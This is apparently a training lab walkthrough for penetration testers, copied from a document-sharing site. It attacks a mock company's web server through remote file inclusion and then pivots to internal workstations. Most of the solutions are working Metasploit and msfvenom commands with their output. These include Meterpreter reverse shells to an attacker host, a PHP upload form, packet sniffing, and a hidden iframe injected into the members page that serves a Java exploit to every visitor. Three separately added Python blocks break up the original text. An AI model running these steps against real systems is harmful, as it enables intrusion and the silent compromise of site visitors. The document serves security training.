The document describes a penetration test scenario where the goal is to exploit vulnerabilities on a web server in order to gain access to internal corporate systems. It provides background on the target organization, IP ranges, and lab environment. The solutions section then demonstrates exploiting a remote file inclusion vulnerability on the web server to upload a payload and execute it to establish a meterpreter session on the internal network.

Uploaded by

Saw Gyi
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
51 views20 pages

© 2018 Caendra, Inc. - Hera For PTP - Blind Penetration Test

The document describes a penetration test scenario where the goal is to exploit vulnerabilities on a web server in order to gain access to internal corporate systems. It provides background on the target organization, IP ranges, and lab environment. The solutions section then demonstrates exploiting a remote file inclusion vulnerability on the web server to upload a payload and execute it to establish a meterpreter session on the internal network.

Uploaded by

Saw Gyi
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 20

© 2018 Caendra, Inc. | Hera for PTP | Blind Penetration Test 1


Your company has been contracted to perform a penetration test against a new client. The
client relies on FooHosting Inc. to host a dedicated web server on which several
organizations' websites are present. Your goal is to obtain access to the target
organization's internal network, meaning you have to exploit one or more internal machines.
You know that the organization's website offers a members' area that is browsed daily by
the organization's employees to perform different tasks.

Target organization: FooCompany

Scope: the client organization defined the scope of the test as:

• Web Server IP address: 10.100.0.100


• Any corporate private address in the range: 192.168.78.0/24

The following image (not reproduced in this text) summarizes the lab environment.



Goals:

• Obtain access to one or more machines of the organization network

What you will learn:

• You will know at the end

Recommended tools:

• Metasploit

In this lab there are no tasks to follow. You are completely free to move around the lab
environment, choose your next steps, and use your own exploits, skills and preferred
tools. Moreover, this lab also requires web application knowledge and exploitation.



Further information:

• Labs machines (like web server and internal organization machines) are not
connected to the internet.
• In order to connect to the target organization's website, you have to add the
following two static entries to your hosts file:

10.100.0.100 foocompany.com
10.100.0.100 members.foocompany.com

• Hosts path:
o Windows: C:\Windows\System32\drivers\etc\hosts
o Linux: /etc/hosts

The next page begins the lab solutions. Read them only when you have finished your lab,
or if you are stuck.

Since our connection to the target network passes through the web server, this is a good
starting point.

The following two /etc/hosts entries allow us to connect to the organization website:

10.100.0.100 foocompany.com
10.100.0.100 members.foocompany.com

With these two lines in place, we are able to browse the organization website:



The first step after reaching the client's website is to probe for vulnerabilities.
Entering the members area (members.foocompany.com), we observe a potential vulnerability:
the “pag” parameter in the URL references an “announcement.txt” file on the web server:

The first test is to check whether we can open that file directly from the browser.
Entering the file name in the address bar, we can read announcement.txt:

The second test is to see whether the page is vulnerable to file inclusion. We check what
happens if we supply a URL instead of a file name; a convenient test URL is the
organization's own website (http://foocompany.com):



This test is successful: the contents of the “foocompany.com” home page have been included
within the body of the index.php page. This means the page is vulnerable to Remote File
Inclusion (RFI). Note that PHP only follows a remote URL in include() when the
allow_url_include directive is enabled (it is off by default), so the host's PHP
configuration is what turns this from a local inclusion into a remote one.
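Including the site's own home page shows that the remote URL was fetched, but the same
symptom is produced by a page that merely downloads and echoes the URL (file_get_contents
or readfile) without executing it. The following added example, which is not part of the
lab material, settles the question with a marker file hosted on the tester's machine: the
marker string is split in two inside a PHP echo, so it only comes back joined if the target
actually ran the remote code. The page URL, the parameter name pag and the attacker host
172.16.5.20 come from the lab; the marker.txt name and the sample response bodies are
constructed for the demonstration.

```python
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Two halves that only appear joined if PHP evaluated the echo. A page that
# fetches and reflects the remote file instead returns the source, halves apart.
_MARK_A, _MARK_B = "RFI7c1e", "exec5a9d"
MARKER = _MARK_A + _MARK_B


def marker_payload() -> str:
    """PHP source to host on the tester's web server (assumed name: marker.txt).
    Give it a non-.php name so the tester's own server never executes it."""
    return f"<?php echo '{_MARK_A}' . '{_MARK_B}'; ?>"


def build_probe_url(page_url: str, param: str, value: str) -> str:
    """Return page_url with `param` set to `value`; other parameters are kept."""
    parts = urlsplit(page_url)
    query = dict(parse_qsl(parts.query, keep_blank_values=True))
    query[param] = value
    return urlunsplit(parts._replace(query=urlencode(query)))


def classify_response(body: str) -> str:
    """rfi-exec:     remote PHP ran on the target (include/require, allow_url_include=On)
    fetch-only:   the remote file was retrieved and echoed but not executed
    not-included: neither the marker nor its source came back"""
    if MARKER in body:
        return "rfi-exec"
    if re.search(r"<\?php\s+echo\s+'" + re.escape(_MARK_A) + "'", body):
        return "fetch-only"
    return "not-included"


def probe(fetch, page_url: str, param: str, marker_url: str) -> dict:
    """Run one probe through `fetch(url) -> body` and return the URL and verdict."""
    url = build_probe_url(page_url, param, marker_url)
    return {"url": url, "verdict": classify_response(fetch(url))}


# Constructed response bodies standing in for the three server behaviours.
_SAMPLE_BODIES = {
    "include": "<html><body>Members area\n" + MARKER + "\n</body></html>",
    "reflect": "<html><body>Members area\n" + marker_payload() + "\n</body></html>",
    "blocked": ("<html><body>Members area\nWarning: include(): http:// wrapper is "
                "disabled in the server configuration by allow_url_include=0\n</body></html>"),
}


def fake_fetcher(behaviour: str):
    """Offline stand-in for an HTTP GET; against the lab you would use requests.get(url).text."""
    return lambda url: _SAMPLE_BODIES[behaviour]


if __name__ == "__main__":
    page = "http://members.foocompany.com/index.php?pag=announcement.txt"
    for behaviour in _SAMPLE_BODIES:
        result = probe(fake_fetcher(behaviour), page, "pag", "http://172.16.5.20/marker.txt")
        print(f"{behaviour:8s} -> {result['verdict']}  ({result['url']})")
```

Only the "rfi-exec" verdict justifies moving on to php_include: a "fetch-only" result is a
server-side request forgery or content reflection, which is a different finding and does
not give code execution.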

With this information, we should be able to exploit the webserver.

There are several ways to achieve this goal, let's see some of them.

In order to exploit this vulnerability, we can use Metasploit, which offers a module for
exploiting RFI vulnerabilities, exploit/unix/webapp/php_include. The following is an example
of the exploit configuration; the XXpathXX token in PHPURI marks where the module inserts
the URL of its own payload server.

msf > use exploit/unix/webapp/php_include
msf exploit(php_include) > set RHOST 10.100.0.100
RHOST => 10.100.0.100
msf exploit(php_include) > set PHPURI /index.php?pag=XXpathXX
PHPURI => /index.php?pag=XXpathXX
msf exploit(php_include) > set SRVHOST 172.16.5.20
SRVHOST => 172.16.5.20
msf exploit(php_include) > set PAYLOAD php/meterpreter/reverse_tcp



PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(php_include) > set LHOST 172.16.5.20
LHOST => 172.16.5.20
msf exploit(php_include) > exploit

[*] Started reverse handler on 172.16.5.20:4444
[*] Using URL: http://172.16.5.20/Tb44IeIC5pyIvC
[*] PHP include server started.
[*] Sending stage (38791 bytes) to 10.100.0.100
[*] Meterpreter session 1 opened (172.16.5.20:4444 -> 10.100.0.100:49852) at 2016-05-09 11:52:01 +0200

When run, the module starts a local web server hosting the PHP payload at
/Tb44IeIC5pyIvC, then requests the vulnerable page with that URL in the pag parameter. The
target includes and executes the payload, which connects back and opens a Meterpreter
reverse TCP session.

NOTE
When replicating this exploit, you may not be dropped into a meterpreter prompt
automatically once the session opens. Press <enter> after the session is opened and then
interact with the session to get the meterpreter prompt:

msf exploit(php_include) > sessions

Active sessions
===============

  Id  Type                 Information                     Connection
  --  ----                 -----------                     ----------
  1   meterpreter php/php  iis_user (0) @ WIN-OTZ1TW2ZPA1  172.16.5.20:4444 -> 10.100.0.100:49852 (10.100.0.100)

msf exploit(php_include) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >



SESSION DIED PROBLEM
After a couple of seconds, our meterpreter session dies:

[*] 10.100.0.100 - Meterpreter session 1 closed. Reason: Died

This method is therefore only partially successful. It creates a Meterpreter session, but
the session dies after a short time, usually about 20 seconds. This is typical of the PHP
meterpreter: it runs inside the web server's handling of a single request, so it is cut off
when the PHP script execution limit is reached.

We need another way to exploit this vulnerability. One option is to upload a PHP shell or
some other payload while the session is alive, within the 20-second window. Here we upload
a self-generated Metasploit reverse TCP executable and then use a second php_include run
to execute it once it is on the target web server.

First, let's create a Meterpreter Windows Reverse TCP payload using msfvenom:

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.5.20 LPORT=5555 -f exe > shell.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes

Now we need to upload this executable. Since our first meterpreter session has died, we
rerun the original php_include exploit module. As soon as the new session opens, we quickly
interact with it and run the upload command; the session stays alive just long enough for
the executable to reach the target.

meterpreter > upload shell.exe
[*] uploading : shell.exe -> shell.exe
[*] Uploaded -1.00 B of 72.07 KiB (-0.0%): shell.exe -> shell.exe
[*] uploaded : shell.exe -> shell.exe
meterpreter >
[*] 10.100.0.100 - Meterpreter session 2 closed. Reason: Died

We now have our secondary payload uploaded to the target web server.



Because we exploited a PHP vulnerability and uploaded the file from the resulting
meterpreter session, shell.exe most likely landed in the web root: the PHP payload runs
inside the web server process, whose current working directory is normally the document
root of the site being served. We can confirm this by requesting the file from the website
in a browser, which shows that our payload is indeed on the web server.

At this point, we need to find a way to execute our uploaded shell.exe payload.

First, let’s make sure we have a handler up and listening ready for an incoming connection
from our payload once we execute it.



msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 172.16.5.20
LHOST => 172.16.5.20
msf exploit(handler) > set LPORT 5555
LPORT => 5555
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse TCP handler on 172.16.5.20:5555
[*] Starting the payload handler...

Next, to execute the payload we uploaded, we can use the php/exec payload together with the
php_include module. php/exec is a PHP payload that simply runs a command on the target, so
going back to exploit/unix/webapp/php_include we set it as the payload and put the name of
our executable in CMD. shell.exe resolves relative to the web server's working directory,
the same place the upload landed:

msf exploit(php_include) > set payload php/exec
payload => php/exec
msf exploit(php_include) > set CMD shell.exe
CMD => shell.exe
msf exploit(php_include) > exploit
[*] Exploit running as background job.

[*] 10.100.0.100:80 - Using URL: http://172.16.5.20:8080/PHaCpzodhWqHa
[*] 10.100.0.100:80 - PHP include server started.
[*] Sending stage (179779 bytes) to 10.100.0.100
[*] Meterpreter session 3 opened (172.16.5.20:5555 -> 10.100.0.100:49170) at 2018-04-30 17:59:09 -0400

msf exploit(unix/webapp/php_include) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                 Connection
  --  ----  ----                     -----------                                 ----------
  3         meterpreter x86/windows  WIN-OTZ1TW2ZPA1\iis_user @ WIN-OTZ1TW2ZPA1  172.16.5.20:5555 -> 10.100.0.100:49170 (10.100.0.100)

msf exploit(unix/webapp/php_include) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
Server username: WIN-OTZ1TW2ZPA1\iis_user
meterpreter >



At this point we have a more stable meterpreter session on the target web server: the
native payload runs as its own process and no longer depends on a PHP request staying
alive.

A second alternative for exploitation is a PHP web shell.

NOTE: Since the machines in the lab are not connected to the internet, we must serve the
web shell from our own machine. There are several ways to do this; here we start a local
web server.

There are many PHP web shells we can use for this purpose; among the well-known ones are
c99, b374k and r57. In this example we use the b374k PHP shell.

To use the web shell we first need to host it on our attacker machine. We can use Python's
SimpleHTTPServer module to quickly stand up a web server on port 80, run from the directory
where the PHP shell is located:

root@kali:~# python -m SimpleHTTPServer 80

Next, we use the RFI vulnerability to make the web server include our PHP shell from the
attacker machine:

URL: http://members.foocompany.com/index.php?pag=http://172.16.5.20/shell



Alternatively, if our only goal is to upload a new meterpreter payload executable, the
following PHP code is enough instead of a full-fledged web shell. Served from our machine
and included the same way, it gives us a form we can use to upload the executable.

<?php
// Minimal uploader, served from the attacker host and pulled in through the RFI.
// The client-supplied file name is kept on purpose: we control the input.
if (isset($_POST["submit"])) {
    $name = $_FILES['file_upload']['name'];
    // Check for errors
    if ($_FILES['file_upload']['error'] > 0) die('An error occurred');

    // Move the file from PHP's temp dir into the web server's working directory
    if (!move_uploaded_file($_FILES['file_upload']['tmp_name'], $name))
        die('Error uploading');

    die('File uploaded successfully.');
}
?>

<!-- No action attribute: the form posts back to the same index.php?pag=... URL,
     so the uploader is included again and the handler above runs. -->
<form method='post' enctype='multipart/form-data'>
    File: <input type='file' name='file_upload'>
    <input type="submit" value="Upload Image" name="submit">
</form>



We can then, as before, use the php/exec payload with the php_include exploit to execute
the uploaded shell.exe, which gives us the more stable native shell.

Once we control the victim server, we can start searching for useful information that
helps us reach our goal. Since this server is the only link between us and the
organization's network (the members area is browsed by the organization's employees), we
can think about how to use it to reach the organization's machines.

What can we do with a Meterpreter session? Pivoting!

The first step is to use the victim server to sniff the network and detect active
devices. For this we can use the Meterpreter sniffer extension.

We choose this extension because it requires no software to be installed on the target
web server, and the traffic other hosts send gives a good idea of what we may want to
pivot to. The sniffer was configured as follows:

meterpreter > use sniffer
Loading extension sniffer...success.
meterpreter > sniffer_interfaces

1 - 'WAN Miniport (Network Monitor)' ( type:3 mtu:1514 usable:true dhcp:false wifi:false )
2 - 'Intel(R) PRO/1000 MT Network Connection' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )
3 - 'Intel(R) PRO/1000 MT Network Connection' ( type:4294967295 mtu:0 usable:false dhcp:false wifi:false )

meterpreter > sniffer_start 2
[*] Capture started on interface 2 (50000 packet buffer)
meterpreter > sniffer_dump 2 /tmp/sniff2.pcap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 434 packets (66843 bytes)
[*] Downloaded 100% (66843/66843)...
[*] Download completed, converting to PCAP...
[-] Corrupted packet data (length:11260)
[*] PCAP file written to /tmp/sniff2.pcap
meterpreter > sniffer_stop 2
[*] Capture stopped on interface 2

We can then analyze the packet capture with Wireshark:

root@kali:/tmp# wireshark sniff2.pcap

In Wireshark, Statistics > Endpoints shows two additional addresses in the victim network
besides the web server: 192.168.78.5 and 192.168.78.25, both inside the 192.168.78.0/24
scope.

Analyzing the traffic, we also see that both machines connect to the server and that both
run an outdated, vulnerable version of Java.

We can also determine from the capture that both machines log in to the members area. To
continue the penetration test, we can modify the members web page and insert a hidden frame
pointing to a Java exploit. This could compromise the client machines and extend our
foothold in the environment.
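The same two facts that Wireshark gives us here, which hosts are talking and which Java
version their requests advertise, can be pulled out of the sniffer_dump file without
Wireshark or scapy. The following added example (not part of the lab material, standard
library only) parses a classic pcap, lists the IPv4 endpoints and TCP flows, and records the
Java version from each client's User-Agent header. The capture bytes it builds are
constructed for the demonstration, not the lab's sniff2.pcap; the addresses are the lab's,
but the request paths and Java version strings are illustrative.

```python
import re
import struct
from collections import Counter

# Java plugin traffic carries the JRE version in the User-Agent header,
# e.g. "User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_26".
JAVA_UA = re.compile(rb"User-Agent:[^\r\n]*?(Java/[\w.]+)", re.IGNORECASE)


def iter_pcap_packets(data: bytes):
    """Yield raw link-layer frames from a classic pcap byte string (not pcapng)."""
    (magic,) = struct.unpack("<I", data[:4])
    if magic == 0xA1B2C3D4:
        end = "<"
    elif magic == 0xD4C3B2A1:
        end = ">"
    else:
        raise ValueError("not a classic microsecond pcap file")
    (linktype,) = struct.unpack(end + "I", data[20:24])
    if linktype != 1:
        raise ValueError("only Ethernet (LINKTYPE_ETHERNET) captures are handled")
    off = 24
    while off + 16 <= len(data):
        _ts_sec, _ts_usec, incl_len, _orig_len = struct.unpack(end + "IIII", data[off:off + 16])
        off += 16
        yield data[off:off + incl_len]
        off += incl_len


def parse_frame(frame: bytes):
    """Return (src_ip, dst_ip, dst_port_or_None, tcp_payload) for IPv4 frames, else None."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":   # EtherType 0x0800 = IPv4
        return None
    ihl = (frame[14] & 0x0F) * 4
    proto = frame[23]
    src = ".".join(str(b) for b in frame[26:30])
    dst = ".".join(str(b) for b in frame[30:34])
    if proto != 6:                                        # not TCP: endpoints only
        return src, dst, None, b""
    tcp = frame[14 + ihl:]
    if len(tcp) < 20:
        return None
    (dport,) = struct.unpack("!H", tcp[2:4])
    data_offset = (tcp[12] >> 4) * 4
    return src, dst, dport, tcp[data_offset:]


def summarize(pcap: bytes) -> dict:
    """Endpoints (what Statistics > Endpoints lists), TCP flow counts, Java version per client."""
    endpoints, flows, java = set(), Counter(), {}
    for frame in iter_pcap_packets(pcap):
        parsed = parse_frame(frame)
        if parsed is None:
            continue
        src, dst, dport, payload = parsed
        endpoints.update((src, dst))
        if dport is not None:
            flows[(src, dst, dport)] += 1
        match = JAVA_UA.search(payload)
        if match:
            java[src] = match.group(1).decode()
    return {"endpoints": endpoints, "flows": dict(flows), "java": java}


# --- constructed sample capture (not the lab's sniff2.pcap) --------------------
def _tcp_frame(src, dst, sport, dport, payload):
    """Ethernet + IPv4 + TCP frame; checksums are left zero since the parser ignores them."""
    eth = bytes.fromhex("000c29aaaaaa") + bytes.fromhex("000c29bbbbbb") + b"\x08\x00"
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 1, 0, 64, 6, 0,
                     bytes(int(o) for o in src.split(".")), bytes(int(o) for o in dst.split(".")))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 8192, 0, 0)
    return eth + ip + tcp + payload


def build_sample_pcap() -> bytes:
    web = "10.100.0.100"
    packets = [
        ("192.168.78.25", web, 49201, 80, b"GET /index.php?pag=announcement.txt HTTP/1.1\r\n"
                                        b"Host: members.foocompany.com\r\n"
                                        b"User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_26\r\n\r\n"),
        ("192.168.78.5", web, 49812, 80, b"POST /login.php HTTP/1.1\r\nHost: members.foocompany.com\r\n"
                                        b"User-Agent: Mozilla/5.0 (Windows NT 6.1) Firefox/10.0\r\n\r\n"),
        ("192.168.78.5", web, 49813, 80, b"GET /members/applet.jar HTTP/1.1\r\nHost: members.foocompany.com\r\n"
                                        b"User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.7.0\r\n\r\n"),
        (web, "192.168.78.25", 80, 49201, b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"),
    ]
    out = bytearray(struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1))
    for i, (src, dst, sport, dport, payload) in enumerate(packets):
        frame = _tcp_frame(src, dst, sport, dport, payload)
        out += struct.pack("<IIII", 1462800000 + i, 0, len(frame), len(frame))
        out += frame
    return bytes(out)


if __name__ == "__main__":
    summary = summarize(build_sample_pcap())
    print("endpoints:", sorted(summary["endpoints"]))
    print("java clients:", summary["java"])
```

Against the real file, replace build_sample_pcap() with open("/tmp/sniff2.pcap", "rb").read();
the "Corrupted packet data" warning from sniffer_dump means a truncated frame may be present,
which parse_frame skips rather than raising on.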



Searching exploit and vulnerability databases, we find that both Java versions are
vulnerable to the Java Applet Rhino Script Engine exploit (CVE-2011-3544).



There are two Metasploit modules we can use for client-side exploitation:

• auxiliary/server/browser_autopwn
• exploit/multi/browser/java_rhino

The first (browser_autopwn) fingerprints the visiting browser and serves it a number of
different browser exploits, while the second (java_rhino) is specific to our environment,
since both clients found are vulnerable to it. We also use browser_autopwn because we do
not know whether other workstations are vulnerable to different exploits; this maximizes
our chances of entering the corporate network through a client-side exploit.

We can configure the modules as follows:

msf > use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn) > set LHOST 172.16.5.20
LHOST => 172.16.5.20
msf auxiliary(browser_autopwn) > set SRVHOST 172.16.5.20
SRVHOST => 172.16.5.20
msf auxiliary(browser_autopwn) > exploit

[*] Auxiliary module execution completed
[*] Setup
[*] Starting exploit modules on host 172.16.5.20...
[*] --- Done, found 20 exploit modules
[*] Using URL: http://172.16.5.20:8080/y0kwSXkukVh
[*] Server started.

We can then insert this URL in the members area of the webserver.



The java_rhino module has a similar configuration to the browser_autopwn module; it is
given its own SRVPORT so both servers can run at the same time.

msf > use exploit/multi/browser/java_rhino
msf exploit(java_rhino) > set SRVHOST 172.16.5.20
SRVHOST => 172.16.5.20
msf exploit(java_rhino) > set SRVPORT 8081
SRVPORT => 8081
msf exploit(java_rhino) > set PAYLOAD java/meterpreter/reverse_tcp
PAYLOAD => java/meterpreter/reverse_tcp
msf exploit(java_rhino) > set LHOST 172.16.5.20
LHOST => 172.16.5.20
msf exploit(java_rhino) > exploit

[*] Started reverse handler on 172.16.5.20:4444
[*] Using URL: http://172.16.5.20:8081/uo3eXen8t0I1n
[*] Server started.

This gives us a second URL that we can use against the organization's corporate network.

Next, we inject a hidden iframe into the members area home page so that our malicious page
is loaded each time someone visits it.

To insert the code, we use the Meterpreter session to download the index.php file, add the
following code, and re-upload index.php to the web server:


if (isset($_GET['pag'])) {
    $variabile1 = $_GET['pag'];
    include($variabile1);   // the unchecked include that made the RFI possible

    // Injected: 1x1 invisible frame that loads the exploit server on every visit
    echo '<iframe src="http://172.16.5.20:8081/uo3eXen8t0I1n" width=1 height=1 style="visibility:hidden; position:absolute;"></iframe>';

} else {
    // ... the original else branch of index.php continues unchanged

Where http://172.16.5.20:8081/uo3eXen8t0I1n is the URL that points to the Java Rhino
exploit server.
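From the defender's side, the injected frame is exactly what a periodic integrity check of
the web root should catch: an iframe that is hidden by style, sized to a pixel, or pointing
off-site. The following added example (not part of the lab material) implements that check
over page HTML with the standard library. The exploit-server URL and the members host are
the lab's; the trusted-host list and the two sample pages are constructed for the
demonstration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit


class _IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag in a document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _is_tiny(dimension: str) -> bool:
    """True for width/height values of 0-2 pixels ("1", "1px", "0")."""
    digits = "".join(ch for ch in dimension if ch.isdigit())
    return digits != "" and int(digits) <= 2


def suspicious_iframes(html: str, trusted_hosts) -> list:
    """Return [(src, [reasons])] for iframes that are hidden, near-invisible in
    size, or point to a host outside trusted_hosts. Relative src values are
    treated as same-site and are only flagged on the other two criteria."""
    collector = _IframeCollector()
    collector.feed(html)
    hits = []
    for attrs in collector.iframes:
        src = attrs.get("src", "")
        style = attrs.get("style", "").replace(" ", "").lower()
        reasons = []
        if "visibility:hidden" in style or "display:none" in style:
            reasons.append("hidden")
        if _is_tiny(attrs.get("width", "")) and _is_tiny(attrs.get("height", "")):
            reasons.append("tiny")
        host = urlsplit(src).hostname
        if host and host not in trusted_hosts:
            reasons.append("off-site")
        if reasons:
            hits.append((src, reasons))
    return hits


# Constructed pages: a clean members page and the same page after the injection above.
TRUSTED = {"members.foocompany.com", "foocompany.com"}
CLEAN_PAGE = ('<html><body><h1>Members area</h1>'
              '<iframe src="http://members.foocompany.com/calendar.php" width=600 height=400></iframe>'
              '</body></html>')
INJECTED_PAGE = CLEAN_PAGE.replace(
    "</body>",
    '<iframe src="http://172.16.5.20:8081/uo3eXen8t0I1n" width=1 height=1 '
    'style="visibility:hidden; position:absolute;"></iframe></body>')

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(name, suspicious_iframes(page, TRUSTED))
```

Run over the rendered output of each PHP page rather than the source file, so that frames
echoed from PHP code, as in the snippet above, are seen the way the victim's browser sees
them.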



With this change, every visit to the index page from a client with the vulnerable Java
plugin automatically results in a Meterpreter session from that client.

All we have to do is wait for one of the vulnerable clients to visit the members page:

msf exploit(java_rhino) >
[*] Java Applet Rhino Script Engine Remote Code Execution handling request
[*] Sending Applet.jar
[*] Sending Applet.jar
[*] Java Applet Rhino Script Engine Remote Code Execution handling request
[*] Java Applet Rhino Script Engine Remote Code Execution handling request
[*] Java Applet Rhino Script Engine Remote Code Execution handling request
[*] Java Applet Rhino Script Engine Remote Code Execution handling request
[*] Sending stage (46089 bytes) to 192.168.78.25
[*] Meterpreter session 3 opened (172.16.5.20:4444 -> 192.168.78.25:42546) at 2016-05-09 17:19:09 +0200
[*] Java Applet Rhino Script Engine Remote Code Execution handling request
[*] Sending Applet.jar
[*] Sending Applet.jar
[*] Java Applet Rhino Script Engine Remote Code Execution handling request
[*] Java Applet Rhino Script Engine Remote Code Execution handling request
[*] Java Applet Rhino Script Engine Remote Code Execution handling request
[*] Java Applet Rhino Script Engine Remote Code Execution handling request
[*] Sending stage (46089 bytes) to 192.168.78.5
[*] Meterpreter session 4 opened (172.16.5.20:4444 -> 192.168.78.5:49812) at 2016-05-09 17:19:22 +0200

Here is where we turn the rest of the penetration test over to you. There is much more to
be discovered. Document your work and don't leave any stone unturned.
